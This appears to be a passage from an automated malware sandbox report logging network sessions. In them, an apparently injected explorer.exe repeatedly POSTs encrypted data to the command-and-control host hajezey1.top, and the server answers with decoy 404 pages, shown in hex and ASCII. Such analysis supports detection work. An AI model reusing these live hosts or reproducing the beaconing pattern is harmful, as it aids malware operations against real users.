                                                                                                                          Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          38192.168.2.749834185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:07:01.792001009 CEST10369OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://doqhc.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 150
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:07:01.792023897 CEST10369OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 88 66 5d 02 c8 a1 c1 64 5d b3 d6 29
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]d])G#L\Cm0\`]z>aoQ<OVg)LJi=5{;
                                                                                                                          Oct 29, 2021 17:07:01.871345997 CEST10370INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:07:01 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          39192.168.2.749835185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:07:01.964858055 CEST10370OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://bwosllgktu.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 296
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:07:01.964868069 CEST10371OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 89 66 5d 02 c8 a1 c1 64 04 d2 bb 71
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]dq1DrgZXy4tW]Hqxe/\O]*C<6'+!(4 3D%+|w|;!sXtgSmIR1!QA$g@PH|Mi`![%^5I
                                                                                                                          Oct 29, 2021 17:07:02.041220903 CEST10371INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:07:02 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          4192.168.2.749830162.159.134.233443C:\Users\user\AppData\Local\Temp\3113.exe
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          40192.168.2.749836185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:07:02.207437992 CEST10373OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://dafoy.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 285
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:07:02.207452059 CEST10374OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 86 66 5d 02 c8 a1 c1 64 16 84 90 6c
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]dl0@p5$xK?ZzEv\F<u'KIupK}8`}GV=B\Qh[^}u&2ENvK>Fmf9U8cG3jy`lv[dZs
                                                                                                                          Oct 29, 2021 17:07:02.287818909 CEST10556INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:07:02 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          41192.168.2.749838185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:07:02.431595087 CEST10730OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://nitiuliqi.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 309
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:07:02.431606054 CEST10730OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 87 66 5d 02 c8 a1 c1 64 40 b2 c2 2c
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]d@,-w?2@@FA<I)dkv%5X>DD(#>}%Dt$MkV--+:(p%(=K0xdCLFo*D#`R*w6_ ]}J/@
                                                                                                                          Oct 29, 2021 17:07:02.510772943 CEST10731INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:07:02 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          42192.168.2.749839185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:07:02.629424095 CEST10731OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://ymtgtssq.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 163
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:07:02.629435062 CEST10732OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 84 66 5d 02 c8 a1 c1 64 0d ba a9 00
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]d}1JaB(PBxKId+yfLG`]2QvB:+I]C4L+~G4
                                                                                                                          Oct 29, 2021 17:07:02.712307930 CEST10732INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:07:02 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          43192.168.2.749840185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:07:02.810054064 CEST10733OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://jvgpciy.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 296
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:07:02.810075998 CEST10733OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 85 66 5d 02 c8 a1 c1 64 42 da af 02
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]dBXy{T9Cg0-{r"Oqb '$*=#m{D&SYU.ON}1+(#qk=:Q~o&)v2nQx$4}+8E=VSH=|lYyY%+[
                                                                                                                          Oct 29, 2021 17:07:02.890841007 CEST10734INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:07:02 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          44192.168.2.749841185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:07:02.999399900 CEST10735OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://drcvhg.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 247
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:07:02.999435902 CEST10735OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 82 66 5d 02 c8 a1 c1 64 49 c4 b2 26
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]dI&0M7TFQ8!^3Giwd=czRci-h`6YAA:hA^Hh?2L8YVN|zR6t21u!.u<."
                                                                                                                          Oct 29, 2021 17:07:03.080619097 CEST10736INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:07:03 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 